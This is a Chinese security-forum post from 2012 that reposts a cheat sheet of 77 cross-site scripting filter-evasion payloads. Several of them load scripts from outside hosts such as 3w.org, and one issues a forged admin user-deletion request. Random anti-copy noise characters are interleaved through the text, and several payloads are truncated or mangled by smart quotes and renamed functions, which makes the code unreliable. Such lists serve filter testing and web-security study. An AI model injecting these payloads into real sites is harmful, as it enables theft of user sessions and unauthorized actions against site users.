貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。/ e1 b1 u" A3 e0 w
+ F& a, a+ n8 _/ s" f
(1)普通的XSS JavaScript注入' F1 s! H" b/ i& V4 s1 X4 D/ u" F( M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) a; o! r9 S6 o$ T6 k F' n9 x
( O6 t: q& K5 o' x7 \6 U (2)IMG标签XSS使用JavaScript命令) t% B# I/ L' \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- V9 x1 E6 ~$ {3 l
# ~6 I' l( p8 j. S& N (3)IMG标签无分号无引号2 m6 L: z, k+ q. I6 d* X; s
<IMG SRC=javascript:alert(‘XSS’)>7 |5 ^+ f, p3 ?1 e5 q; T2 a3 n" h
8 ^0 O9 n3 Q: s0 [( K9 n (4)IMG标签大小写不敏感8 ]% w6 W3 z$ A; p' D# H' ^( r
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: X7 N, l3 u2 D+ K8 T. U2 R; p
0 x: e, k) R3 ^% ], w+ ] (5)HTML编码(必须有分号)
- P V- r; Y3 y <IMG SRC=javascript:alert(“XSS”)>) r0 W. G- k% n& \! p
/ p9 e3 a4 |; V6 S6 L# { (6)修正缺陷IMG标签 \) H4 U7 Q6 {* s% W
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ o A# v" g5 o8 u. y
! ~8 C5 R; N" k+ }$ O& Y! m7 M( j (7)formCharCode标签(计算器)9 t+ j2 `2 ^* }# n
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. K5 V2 P" M. F' K- n* i& C8 G9 H
8 C/ g6 s" ~" f" g) a (8)UTF-8的Unicode编码(计算器)
" f6 D! E6 a8 Z9 y, c <IMG SRC=jav..省略..S')>/ S2 o/ |& H: ^& t2 U& b6 r) h
- Z# h+ O0 _1 f (9)7位的UTF-8的Unicode编码是没有分号的(计算器)" O+ M7 @& `5 ~+ h: ?
<IMG SRC=jav..省略..S')>. V. T3 U3 k: R; F9 J. j
1 \9 q) v+ i+ m% ^# e( ^1 X& I! z% h2 x. }
(10)十六进制编码也是没有分号(计算器)% M$ ?3 X$ l+ R; {. K
<IMG SRC=java..省略..XSS')>
; s* y4 l8 p9 d! q3 T6 @ x8 C3 F# E$ v) T6 S5 x
(11)嵌入式标签,将Javascript分开/ y. w( Z3 g& F. `8 K, c
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 S& K6 p! V, a+ X; g/ R c
/ C( y0 k! O6 N$ M9 N4 V: }0 _- [2 B (12)嵌入式编码标签,将Javascript分开
& q; I* n. X: k6 I& d <IMG SRC=”jav ascript:alert(‘XSS’);”>+ n5 s% B0 ]2 `) F& c8 y9 l5 `9 {
& n1 _- V7 w' B$ e7 j' Z
(13)嵌入式换行符
' n* ?6 w- U* r7 P3 |7 g <IMG SRC=”jav ascript:alert(‘XSS’);”>% r! ^% n8 ~* N0 A+ ~
2 P" e8 f/ M# a
(14)嵌入式回车/ D: J8 M O, N8 T( h+ `& I" U
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 d9 g' A2 t. R0 [6 r% e; V
6 ^( `3 H$ u6 [& f" Y6 [ (15)嵌入式多行注入JavaScript,这是XSS极端的例子
" s- Y* @) J' ?, B; A( K A <IMG SRC=”javascript:alert(‘XSS‘)”>
; G/ [9 e8 M+ } S& A& J5 ~0 N8 x. K; W+ r9 X
(16)解决限制字符(要求同页面)8 K( l9 K$ ?; k& `
<script>z=’document.’</script>
4 [6 h# M, R0 O0 _0 s" J; Z- j4 v7 Z <script>z=z+’write(“‘</script>
4 k* |/ i; l U% J& u. f5 Z; X8 y3 a <script>z=z+’<script’</script>. M2 u. Q2 A0 L D
<script>z=z+’ src=ht’</script>% O/ U z2 s' K; a4 P7 N2 H4 N
<script>z=z+’tp://ww’</script>
& d; _( ^' G" f <script>z=z+’w.shell’</script>
1 c) J* f0 ^" ^8 U' k <script>z=z+’.net/1.’</script>* A* a6 ?2 D2 f
<script>z=z+’js></sc’</script>9 u$ S6 @" u6 X7 [
<script>z=z+’ript>”)’</script>' ~& m; X& F+ p0 z+ E* z
<script>eval_r(z)</script>
. S+ O& Z1 c9 k- J6 e9 X' B( O
) H) {+ X( z# q# g (17)空字符& T) e8 e3 u$ l" r, e1 L
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& W% o# |, l$ g, b9 @
) v0 }' O' ?# t0 }$ f (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. b+ S; |& T$ Z, Q) t' r
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ f5 K, S9 v4 }0 b* n+ p9 [
, h \( [' x! F. w7 e
(19)Spaces和meta前的IMG标签
% E q1 G4 h5 d <IMG SRC=” � javascript:alert(‘XSS’);”>; i8 j+ U7 |( h, @" l2 \
' t, p# h; w, q1 [/ E) f
(20)Non-alpha-non-digit XSS5 V" K8 H. e5 \: @' }% d2 F
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 I2 f/ q$ [5 A1 c0 G: ^+ M
& H+ y: C' B$ }6 I6 Y$ E (21)Non-alpha-non-digit XSS to 22 A( M5 D/ j7 b* b# O7 \
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! a7 q& C! r+ w1 d" R/ W t
5 ?+ f: ?: g V! c (22)Non-alpha-non-digit XSS to 3
' N" t( l; V' ?/ Q <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 B3 |4 w: G7 i" h$ X) h4 G* O, Q( C! m- D5 e0 a8 V
(23)双开括号% [/ n: O0 E2 Y: F4 N7 m
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
- n; D6 I1 x8 x- R8 k5 ?2 ~9 Y! {# F
(24)无结束脚本标记(仅火狐等浏览器)) H* Q" W) |/ |; }7 S) l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 d3 @- C, a1 d+ ]8 Z8 k, N4 \0 o8 p' e; Q* ]5 W- A
(25)无结束脚本标记2
# _% F$ O5 ~: j% E( u9 j <SCRIPT SRC=//3w.org/XSS/xss.js>% N9 O7 N: I$ \* C
& d. X s5 d( a; Q3 U- F4 b, u" D4 j (26)半开的HTML/JavaScript XSS
' m8 X7 |( s" u3 V9 O9 X! G <IMG SRC=”javascript:alert(‘XSS’)”
: u% @6 I) w, \0 J7 W3 T% A
e, O d/ e; K F* R (27)双开角括号
: K0 A2 v1 V! s/ x3 f <iframe src=http://3w.org/XSS.html <3 B1 z4 @! @; I/ p$ H
+ @( d1 e1 k0 W, a3 R) d) m (28)无单引号 双引号 分号
7 {$ ?- j6 v7 m8 `' l <SCRIPT>a=/XSS/9 M/ o) P. Y# S3 P$ f8 {3 z
alert(a.source)</SCRIPT>' ]4 q$ y# c( L! V3 m! Y
5 l" P* |3 R8 Y' c& y: l (29)换码过滤的JavaScript( S) ^; x, A f r# A7 u
\”;alert(‘XSS’);//
0 h( z+ P7 e+ i+ v4 V/ F; F" @
6 Q$ Y; h; a' \# a* f (30)结束Title标签
4 q \% _4 H5 G3 { </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! T( ~3 ^$ g- @! h# S: f- n
) b1 b4 D5 u$ B; L
(31)Input Image
0 G+ g+ z( e% D- v0 d! n, S5 i0 ] <INPUT SRC=”javascript:alert(‘XSS’);”>7 _5 [, c- f4 g# c( m' |( o
7 U1 h3 d0 F5 m8 P
(32)BODY Image9 i; z. C7 q: j1 z' z% ~2 n$ }
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
7 Z0 H4 G1 i9 Y, w9 U: D8 Q1 X p3 x* r% Q1 t5 i6 E+ X Z
(33)BODY标签, _; }( T. M$ K
<BODY(‘XSS’)>* Y$ {2 y1 E6 ?& Q* y
! J$ c% i( b! K4 O% p r" J (34)IMG Dynsrc7 ]' j: t- s1 c
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 g( |$ c, t+ M! x
H- h- `5 Y1 g3 p6 P1 r4 S (35)IMG Lowsrc& b( q, x% b( M, `
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 |: y5 v4 B. X+ `( l- G' [
, H1 N6 g; r+ Z% T3 r (36)BGSOUND
5 r4 `. k* R+ P" W6 ] <BGSOUND SRC=”javascript:alert(‘XSS’);”>3 m: w+ Y& z6 v% D8 Z, S
) X. @6 _* B# N9 T. F' B5 z/ m: @
(37)STYLE sheet* F, c! |; e! q$ w; n
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>8 u+ M* A$ `( s
2 f9 ^5 G# [, Q) r# O: B1 m; f
(38)远程样式表
' v9 g* ], G, t/ l0 u% Q( @: z <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ R1 C/ O; R w& E# A1 C8 C. w$ l
(39)List-style-image(列表式)
0 B: p! @1 B F$ b/ m8 R: G% ~ <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% t7 N5 Z1 i6 P8 H$ O* ~ S7 o
' E' O, Y X2 g) J8 Q S- C6 H
(40)IMG VBscript
# W! K' x% [6 F0 ^0 |- I3 o- J" M <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS: a n# e/ U' V# U
! R) P! _3 ?+ k4 P& X7 D (41)META链接url, v: n" g& r9 z5 P# a
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 |8 W0 X: J+ `0 m y3 A7 s. [/ h( L/ Z
(42)Iframe
6 }8 \4 o. A5 u ^& g% n, ? <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# d4 L5 ~ Y; l7 b9 {
5 M/ B: i; G* l% {1 M: g (43)Frame
$ w' E, ?2 g$ E! { <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
f" w9 q! c# c. ?# V! g: D+ a; k5 {5 T6 g
(44)Table
/ `' a& |( t c6 A7 y <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. ^. k1 E# H1 y2 y8 {
/ D" \3 L& B% P+ R0 n2 N
(45)TD
+ {, F& \/ h# J/ A$ t, Z <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ v8 W0 O+ [; Y2 e
7 ~) R4 l/ e; x* c# v- L (46)DIV background-image
9 `0 ]4 p$ {5 J2 s <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. I0 X( ^# j2 m/ p6 f
0 q# v G, A. Y1 M4 x
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: O& |" Q. j, j( `9 @) Q <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
( j/ V% r( r% }, O+ q" Z# V* ~- M+ R+ u9 d* [) t
(48)DIV expression5 }8 B9 @8 e* G) t1 e$ `( o) b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' J$ x8 j: b: `: C# D5 Y! t
! T$ ]! Q! y3 r6 \
(49)STYLE属性分拆表达0 Z' v" W; y. |- ?
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" y* W+ `: i3 d, h3 t! ]+ i1 G
- a9 E3 \, v+ k3 @- M J% K (50)匿名STYLE(组成:开角号和一个字母开头)
. M' t w2 ^$ g2 E8 K9 ?& H& D <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* j! _7 p: P' V
' h+ |: Z1 W; T0 g( d5 E! ` (51)STYLE background-image, m+ b& W3 [+ X! n7 l' B+ s1 g
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
* x( a# k5 ~0 o7 |& O* f
' \; ~- n3 D( {- J3 q9 @, C. k (52)IMG STYLE方式
, I5 q0 J7 x+ t0 K% }' m5 i exppression(alert(“XSS”))’>5 a% k" B" g, t0 A+ h- o3 B. {
- C a3 w+ j+ g( i
(53)STYLE background
/ F w* b8 ~: \* i9 \4 E <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# a! q, z: B+ T) y$ `* l$ e
8 p' N! J0 v/ W( ]8 t5 m (54)BASE: ?7 `2 `. H3 t5 c
<BASE HREF=”javascript:alert(‘XSS’);//”>' W- \. \( B u8 L5 Q
9 @" Q7 Z+ ?, B" J5 F. T. k7 x9 ~ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( D$ m; l: C) V; o g) ?7 h* p <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 P1 M( i. y4 P
& z# g! w' }' \" d$ J, b' W
(56)在flash中使用ActionScrpt可以混进你XSS的代码
1 `' q( X8 o" }# F0 r a=”get”;; u! O9 R3 i/ ~3 X+ o0 U
b=”URL(\”";1 {0 g/ u5 X: ], y) |
c=”javascript:”;
3 k) t8 O0 ^9 v d=”alert(‘XSS’);\”)”;. n2 v! j1 R# _; P6 A, t. n' O
eval_r(a+b+c+d);4 Q( A3 g* I3 M. B/ P1 j
- Q& F) p' g4 K6 D" k: Q (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" f4 N0 \ M9 V/ U <HTML xmlns:xss>
, [, ~% x( F4 E <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>" m0 L+ |2 y* U5 {0 U% s9 W" W
<xss:xss>XSS</xss:xss>( E: {5 V4 p* {8 N. R4 T& u s
</HTML>
! t( ^* d/ U9 y" \. J7 W3 K# @. \5 z# E5 a& N# D/ y
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% c: E& a5 r4 R- i! T( f <SCRIPT SRC=””></SCRIPT>
I4 x7 m6 @: a$ b9 M% {, J
2 j/ u0 F+ }5 h6 S* i) I& r (59)IMG嵌入式命令,可执行任意命令
{0 _ E9 z; M6 V <IMG SRC=”http://www.XXX.com/a.php?a=b”>
( b) _) j2 f* l9 G: C7 g; P% J' }/ D
(60)IMG嵌入式命令(a.jpg在同服务器)# m3 C# D3 A8 Q/ O. m: e
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; @& `7 Y+ E2 l" {6 |
; o" O- d5 v: I9 j& p4 z (61)绕符号过滤
! m5 E* q" m( n: Z) a <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 _6 _( R% I+ A' i& K2 d! g
7 A* b% q. T3 s' W) l( o4 b
(62)
4 _8 w8 M* Z- m2 f; y8 k* l <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>) G- K0 Y+ B; ]# q6 m& e
( \0 I; y1 ^3 }, {# f& z% | (63)
" z( w7 p: q, Z <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
$ Z! i, a# q5 \7 ]6 K2 a4 W$ i$ C8 t, @# _: ?
(64)
0 \& ?& J% Y6 q. w9 P ], p9 v# y <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
p @# _' b; Q7 K
" @0 f" @1 k# Q* Z' n9 R (65)8 D7 R! w @* j/ W) d( ?
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>) ~2 N% R' _0 W1 E% g2 G* p
4 H e& I6 M2 \- c7 k
(66)" @9 C d7 f- D; E" F: c
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
; s8 ?7 [. C$ _9 b) S# U; @5 R( z! L# Y' P4 S, m2 H# `
(67)
5 B3 R1 Q3 {, h7 @ <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
7 P; V+ M3 c6 y, K, s
0 Z; |# B% R- j (68)URL绕行: `( T, n; {0 ?7 ~9 V4 h4 U" ^
<A HREF=”http://127.0.0.1/”>XSS</A>6 n) a, j7 @, q& r& _
3 }" A( x' \$ a) y% [7 ^5 F- z (69)URL编码
1 r; X% o" H" W- a <A HREF=”http://3w.org”>XSS</A>1 |" ~* u) o8 {4 j1 S4 f. t" I
9 i# M# \5 S( z- J/ Z m9 P
(70)IP十进制3 m7 d( m1 t1 t3 C, V! U
<A HREF=”http://3232235521″>XSS</A>
0 N* I9 e2 F0 c9 O& Y9 V0 ~; Y2 n) M* v0 Q1 U
(71)IP十六进制( _( j- O. P% N4 O5 m$ ~. c
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
) N) ?' W" k1 W7 s! I3 A
9 N, k5 S s4 v6 W9 \3 h (72)IP八进制5 V1 ]* F. ~/ C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ |- W) _5 q9 f( X; H3 R# K6 f! d7 [
1 N' Q7 ?5 j ?. c! ^8 N4 A- ~
(73)混合编码3 K) i( ]7 E/ d7 `4 f7 M# L
<A HREF=”h
& ~+ L" v; V1 x; L6 i tt p://6 6.000146.0×7.147/”">XSS</A>* R; H6 ~( {( K6 L5 t
/ S/ r2 O- ^# y, |
(74)节省[http:]- O' I) G6 _0 n% ^2 s5 Z# c# X
<A HREF=”//www.google.com/”>XSS</A>3 V' h& I' Y. O
& _+ o; J" ?( j0 F
(75)节省[www]9 L0 z4 h& r& ~: t: r/ a( u1 Z
<A HREF=”http://google.com/”>XSS</A>
( M& k e+ w0 H! ^, U
; b) _1 |0 n& G& s+ P (76)绝对点绝对DNS/ a1 L% j1 [/ k
<A HREF=”http://www.google.com./”>XSS</A>0 @9 c: {9 C F
: y3 `- |( Y- Q7 S& U* D (77)javascript链接; U* @. `0 [4 q; v5 B, y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对